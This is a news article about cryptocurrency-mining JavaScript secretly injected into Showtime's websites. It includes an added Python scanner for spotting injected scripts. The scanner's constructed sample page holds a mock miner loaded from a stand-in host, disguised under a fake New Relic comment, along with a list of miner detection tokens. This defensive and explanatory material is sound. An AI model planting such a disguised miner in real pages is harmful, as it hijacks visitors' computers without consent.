CBS's Showtime caught mining crypto-coins in viewers' web browsers

Who placed the JavaScript code on two primetime dot-coms? So far, it's a mystery


The websites of US telly giant CBS's Showtime contained JavaScript that secretly commandeered viewers' web browsers over the weekend to mine cryptocurrency.

The flagship Showtime.com and its instant-access ShowtimeAnytime.com sibling silently pulled in code that caused browsers to blow spare processor time calculating new Monero coins – a privacy-focused alternative to the ever-popular Bitcoin. The hidden software typically consumed as much as 60 per cent of CPU capacity on computers visiting the sites.

The scripts were written by Coin Hive, a legit outfit that provides JavaScript to website owners: webmasters add the code to their pages so that they can earn slivers of cash from each visitor as an alternative to serving adverts to generate revenue. Over time, money mined by the Coin-Hive-hosted scripts adds up and is transferred from Coin Hive to the site's administrators. One Monero coin, 1 XMR, is worth about $92 right now.

However, it's extremely unlikely that a large corporation like CBS would smuggle such a piece of mining code onto its dot-coms – especially since it charges subscribers to watch the hit TV shows online – suggesting someone hacked the websites' source code to insert the mining JavaScript and make a quick buck.

The JavaScript, which appeared on the sites at the start of the weekend and vanished by Monday, sits between HTML comment tags that appear to be an insert from web analytics biz New Relic. Again, it is unlikely that an analytics company would deliberately stash coin-mining scripts onto its customers' pages, so the code must have come from another source – or was injected by miscreants who had compromised Showtime's systems.
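The pattern described above (a script loaded early in the page, wrapped in HTML comments attributed to a vendor whose domain it does not actually come from, plus an inline loader carrying a miner throttle setting like the one The Pirate Bay misconfigured) is the sort of thing a site operator can check for in their own page source. The scanner below is an added example, not code from The Register, Showtime, New Relic or Coin Hive: it parses a page with Python's standard HTML parser, records every `<script>` with the comment that precedes it, and flags external scripts from hosts outside an assumed allowlist, comment attributions that do not match the script's real origin, and inline scripts containing a constructed list of miner-style tokens. The sample page, the allowlist and the vendor-to-domain map are all constructed for the example.

```python
"""Scan page HTML for injected third-party scripts (added example; the
allowlist, vendor map, hint tokens and sample page are all constructed)."""

from dataclasses import dataclass
from html.parser import HTMLParser
from typing import List, Optional
from urllib.parse import urlparse

# Assumed allowlist: domains the site operator expects to serve its scripts.
ALLOWED_SCRIPT_HOSTS = ("showtime.com", "newrelic.com")

# Assumed map from a vendor name (as it appears in an attribution comment,
# spaces removed) to the domain suffix a script claiming that vendor should use.
VENDOR_DOMAINS = {"newrelic": "newrelic.com"}

# Constructed heuristic: tokens commonly found in in-browser miner loaders.
MINER_HINTS = ("miner", "throttle", "hashes")


@dataclass
class ScriptRecord:
    index: int                   # order of appearance in the page (0 = first)
    src: Optional[str]           # external URL, or None for inline code
    body: str                    # inline code (empty for external scripts)
    preceding_comment: str       # nearest HTML comment before the tag, lowercased


class ScriptCollector(HTMLParser):
    """Collect every <script> together with the HTML comment that precedes it."""

    def __init__(self) -> None:
        super().__init__()
        self.scripts: List[ScriptRecord] = []
        self._last_comment = ""
        self._open: Optional[ScriptRecord] = None

    def handle_comment(self, data: str) -> None:
        text = data.strip().lower()
        # A closing marker ("End New Relic", "/foo") ends an attribution
        # rather than starting one, so it clears the pending comment.
        self._last_comment = "" if text.startswith(("end", "/")) else text

    def handle_starttag(self, tag: str, attrs) -> None:
        if tag == "script":
            src = dict(attrs).get("src")
            self._open = ScriptRecord(len(self.scripts), src, "", self._last_comment)
            self._last_comment = ""  # each comment attributes one script only

    def handle_data(self, data: str) -> None:
        if self._open is not None:  # parser is in CDATA mode inside <script>
            self._open.body += data

    def handle_endtag(self, tag: str) -> None:
        if tag == "script" and self._open is not None:
            self.scripts.append(self._open)
            self._open = None


def host_of(url: str) -> str:
    return (urlparse(url).hostname or "").lower()


def host_under(host: str, domain: str) -> bool:
    return host == domain or host.endswith("." + domain)


def scan_page(html: str) -> List[dict]:
    """Return a list of findings; an empty list means nothing looked off."""
    parser = ScriptCollector()
    parser.feed(html)
    parser.close()
    findings = []
    for rec in parser.scripts:
        if rec.src:
            host = host_of(rec.src)
            if not any(host_under(host, d) for d in ALLOWED_SCRIPT_HOSTS):
                findings.append({"script": rec.index, "kind": "unexpected_host",
                                 "detail": host})
            claimed = rec.preceding_comment.replace(" ", "")
            for vendor, domain in VENDOR_DOMAINS.items():
                if vendor in claimed and not host_under(host, domain):
                    findings.append({"script": rec.index, "kind": "attribution_mismatch",
                                     "detail": f"comment claims {vendor}, script from {host}"})
        else:
            hits = [t for t in MINER_HINTS if t in rec.body.lower()]
            if hits:
                findings.append({"script": rec.index, "kind": "miner_hints",
                                 "detail": ",".join(hits)})
    return findings


# Constructed sample page mirroring the described layout: a miner loaded
# early, between comments that claim to be a monitoring vendor's insert.
SAMPLE_PAGE = """<!doctype html>
<html><head><title>Constructed sample page</title>
<!-- New Relic browser monitoring (constructed attribution) -->
<script src="https://cdn.miner.example/lib/miner.min.js"></script>
<script>
  var m = new Miner.Anonymous("SITE-KEY-PLACEHOLDER", { throttle: 0.4 });
  m.start();
</script>
<!-- End New Relic -->
<script src="https://www.showtime.com/static/app.js"></script>
</head><body>...</body></html>"""

if __name__ == "__main__":
    for finding in scan_page(SAMPLE_PAGE):
        print(finding)
```

Run against a page fetched as the browser would see it, the scanner reports the early external script from an unlisted host, the mismatch between the "New Relic" comment and that host, and the inline loader that sets a throttle; the site's own script after the closing comment produces nothing. The hint-token check is deliberately crude and only meant to surface candidates for a human to read, and the allowlist is the part that carries real weight, so it should be maintained from the site's actual script inventory.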

Here's a screenshot of the code on showtime.com, seen by El Reg before it was removed. The mining script was loaded early on the page, we note.

[Screenshot: the injected mining script in the showtime.com page source]

And on Showtime Anytime:

[Screenshot: the injected mining script in the showtimeanytime.com page source]

We contacted both Showtime and New Relic today asking for more details. Showtime refused to comment. New Relic told us it had nothing to do with the mystery code.

"We take the security of our browser agent extremely seriously and have multiple controls in place to detect malicious or unauthorized modification of its script at various points along its development and deployment pipeline," New Relic's Andrew Schmitt told us.

"Upon reviewing our products and code, the HTML comments shown in the screenshot that are referencing newrelic were not injected by New Relic's agents. It appears they were added to the website by its developers."

We also asked Coin Hive for details on the user account the injected code was mining for. "We can't give out any specific information about the account owner as per our privacy terms," the outfit informed us. "We don't know much about these keys or the user they belong to anyway."

The outfit did confirm to us, however, that the email address used to set up the account was a personal one, and was not an official CBS email address, further suggesting malicious activity.

Pirate Bay

Coin Hive's mining code was at the center of some attention last week when file-sharing search engine The Pirate Bay admitted it had added the coin-gathering JavaScript on its pages in order to test its profitability in an effort to get rid of ads on its site.

The code was poorly configured – web admins are allowed to set the hashing rate – and resulted in people's machines slowing to a crawl, sparking complaints. Following the outcry, The Pirate Bay acknowledged the presence of the mining script, calling it "only a test," and promised to limit the CPU usage to make it less annoying. A few days later, the organization dropped the idea altogether.

Coin Hive not only offers in-page mining but also mining through URL shorteners and CAPTCHAs. The huge advantage to the website operator using the code is that the script uses not only someone else's processing power but also their electricity, meaning that you can make money with very little effort, so long as you are willing to annoy your visitors.

Coin Hive's pitch is that this script could allow publishers to pull annoying ads from their websites – which is something that could become more important as browsers increasingly block ads.

However, the code has already been inserted in browser extensions and on typosquatted websites. And now, it looks as though someone may have tried to hack Showtime's website in order to insert the code and make money while not having any direct impact on the website itself.

If Coin Hive wants to be seen as legitimate rather than a tool for hackers and malware authors, it is going to have to rapidly figure out a better authorization system for big websites and work on making itself less attractive to scammers. Meanwhile, ad blocking tools are now killing the JavaScript on sight. ®

Hat tip to Troy Mursch for alerting us to this mystery.
